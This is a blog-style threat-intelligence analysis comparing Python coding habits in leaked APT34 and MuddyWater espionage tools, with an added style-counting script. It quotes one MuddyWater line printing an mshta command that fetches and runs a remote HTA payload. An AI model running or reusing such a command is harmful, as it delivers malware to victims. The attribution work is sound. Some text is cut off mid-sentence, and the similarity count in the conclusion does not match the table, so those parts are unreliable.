Many state-sponsored groups have been identified over time. Many of them have several names (since they were discovered by different organizations), there is no agreed standardization on the topic, and yet many victims and some interests look tightly connected. From here came the idea of comparing the leaked source code of two different state-sponsored cyber-espionage groups, looking for similarities and differences in coding style rather than in functionality.
While I have analyzed several APT34 samples (some of my public analyses are available here, here and here), it is the first time I take a closer look at MuddyWater artifacts. The leaked MuddyWater tools, currently available here, are written in Python and implement neat functionality to automate infection chains.
The MuddyWater attacks are primarily against Middle Eastern nations. However, we have also observed attacks against surrounding nations and beyond, including targets in India and the USA. MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call “POWERSTATS”. Despite broad scrutiny and reports on MuddyWater attacks, the activity continues with only incremental changes to the tools and techniques. (MISP-TI)
Today I’d like to look for strong and weak similarities between APT34 and MuddyWater. I won’t reach any conclusion so far, so I am not getting into the topic “they are the same group”, or “they actually live in the same building”, or again “they do not belong to the same matrix”, or whatever topic related to that; but I think there are some similarities (mostly weak) and quite evident differences (again, weak differences) in the way they code in Python. I am aware that the following practices are not overwhelming evidence, but you might agree with me that developers spend years defining the best and most beautiful way to write their code. It would be difficult to code in “someone else’s style” by changing one’s coding habits.
The sources I am going to compare are those belonging to the “last leaked” MuddyC3 and to the “previously leaked” WebMask. Everything is freely available online for further checks. The following sections introduce some notes on the observed coding styles and try to explain them.
The sources show differences in the printing function. MuddyWater implements a more “fancy” printing function, adding the symbol “[+]” when things go in the right direction and the symbol “[-]” when the flow hits errors or some unwanted condition. Moreover, MuddyWater uses colour in its output by implementing a core module called colors.py. These amenities are not available in the APT34 sources.
Both groups use single quotes for printed strings and use the + operator for string concatenation in print functions rather than the %s operator. In complex substitution strings MuddyWater puts \n at the beginning and at the very end of the string, while in the APT34 sources this is not a common practice, e.g. print "\nmshta http://%s:%s/hta\n"%(config.IP,config.PORT) (MuddyWater style). APT34 tends to leave commented-out prints such as #print 'something', while in MuddyWater this is not a common practice at all (only one occurrence). I would say that the print behaviour differs from one to the other.
Payload delivery as multi-line string
Both of the analysed groups use multi-line strings to deliver their payloads. However, the writing style is quite different. For example, APT34 uses a “real” multi-line string, while MuddyWater abuses the multi-line string by exploiting its indirect auto-escape properties. The following images show what I mean by “exploiting the auto-escape” property.
MuddyWater delivers its payload in an inline multi-line string, avoiding the need to escape special characters, while APT34 prefers the same technique but expands the payload in order to improve readability. However, both groups frequently use the += operator for concatenation and both of them use ' '.join( to build up objects from empty strings. It is interesting to spot a different style inside the MuddyWater package itself: in core/webserver.py the developer uses ' '.join(, while in core/resa.py the developer used both ' '.join( and " ".join( (NB the double quotes). This is quite weird to me; maybe more than one developer was involved in the development?
Code functions and loops
Both groups use a quite clear and identical function nomenclature. While a developer might choose among many different nomenclatures, such as “CamelMultipleNames”, “Firstcapital”, “lowercase”, “with_underscore”, and so on, both APT34 and MuddyWater have chosen the “lowercase_with_underscore” style. If you are thinking “Hey, but this is a Python best practice!”, well, it is true, but it is also true that it is not a mandatory choice; moreover, the analysed source codes do not implement PEP8/4 at all, so I don’t think the developers followed the suggested style guidelines. Again, both groups make heavy use of the operator rather than using for i in range or a while loop. Both adopted decent code protection, in order to avoid unexpected exceptions or unmanaged user input that might raise weird behaviours. MuddyWater is well known for the way they obfuscate PowerShell payloads. They like to use replace functions. The following image shows a crafted internal function called
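As an added example (not code from the original post nor from either leaked toolset), the following script counts the style markers discussed in the sections above: newline-wrapped print strings, [+]/[-] status markers, commented-out prints, += concatenation, single- versus double-quoted join separators, triple-quoted payload strings and def naming. It works on the token stream rather than the AST, so Python 2 sources with print statements are accepted; the two embedded samples are constructed to imitate the habits described and are not the real sources.

```python
import io
import re
import tokenize
from collections import Counter
SNAKE = re.compile(r"^[a-z][a-z0-9_]*$")   # lowercase_with_underscore def names
CAMEL = re.compile(r"[a-z][A-Z]")           # any lower->upper transition

def style_profile(src):
    """Counter of style markers in the token stream of src (Python 2 print OK)."""
    c = Counter()
    toks = list(tokenize.generate_tokens(io.StringIO(src).readline))
    for i, tok in enumerate(toks):
        kind, text = tok.type, tok.string
        if kind == tokenize.COMMENT and re.match(r"#\s*print\b", text):
            c["commented_print"] += 1              # #print 'x' (APT34 habit)
        elif kind == tokenize.OP and text == "+=":
            c["plus_equals"] += 1                  # s += part (both groups)
        elif kind == tokenize.NAME and text == "def":
            name = toks[i + 1].string
            if SNAKE.match(name):
                c["def_snake"] += 1
            elif CAMEL.search(name):
                c["def_camel"] += 1
        elif kind == tokenize.STRING:
            lit = text.lstrip("rRbBuUfF")          # drop any string prefix
            body = lit.strip(lit[0])               # drop quotes (triples too)
            if lit[:3] in ("'''", '"""'):
                c["multiline_string"] += 1         # triple-quoted payload string
            if body.startswith("\\n") and body.endswith("\\n"):
                c["newline_wrapped"] += 1          # "\n...\n" (MuddyWater habit)
            if "[+]" in body or "[-]" in body:
                c["status_marker"] += 1            # [+]/[-] (MuddyWater habit)
            if [t.string for t in toks[i + 1:i + 3]] == [".", "join"]:
                c["join_double" if lit[0] == '"' else "join_single"] += 1
    return c

# Constructed samples imitating the two habits described above (not leaked code).
MUDDY_LIKE = r'''
def start_listener(ip, port):
    print "\n[+] listening on %s:%s\n" % (ip, port)
    return ' '.join(['[-] no clients', ip, """<html>hello</html>"""])
'''
APT34_LIKE = r'''
def build_page(host):
    #print 'debug: ' + host
    page = ''
    page += 'line one'
    return ' '.join([host, page])
'''
```

Run style_profile over each file of a leaked package and compare the resulting counters per file; a file whose profile deviates from the rest (for instance the double-quoted join separator noted above) is the one worth a closer manual look.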
The following table sums up the similarities and the differences that I found. You will find a - character for every difference and a + character for each similarity. Again, I am not expressing any personal opinion about group membership, and I am aware that some of these similarities could be associated with good coding practice, but I believe it is still interesting to know that these two groups have their own style similarities.
| Feature | MuddyWater | APT34 | +/- |
|---|---|---|---|
| Printing style | \n at the beginning and the very end | No | - |
| Comment usage | Not significant | Yes | - |
| Multi-line delivery | Multi-line “inline” | Real multi-line | - |
| Join statement | Wide usage of ' '.join( | Wide usage of ' '.join( | + |
If we consider the first three differences as a single difference, since they all concern “printing”, we observe 3 differences and 5 similarities.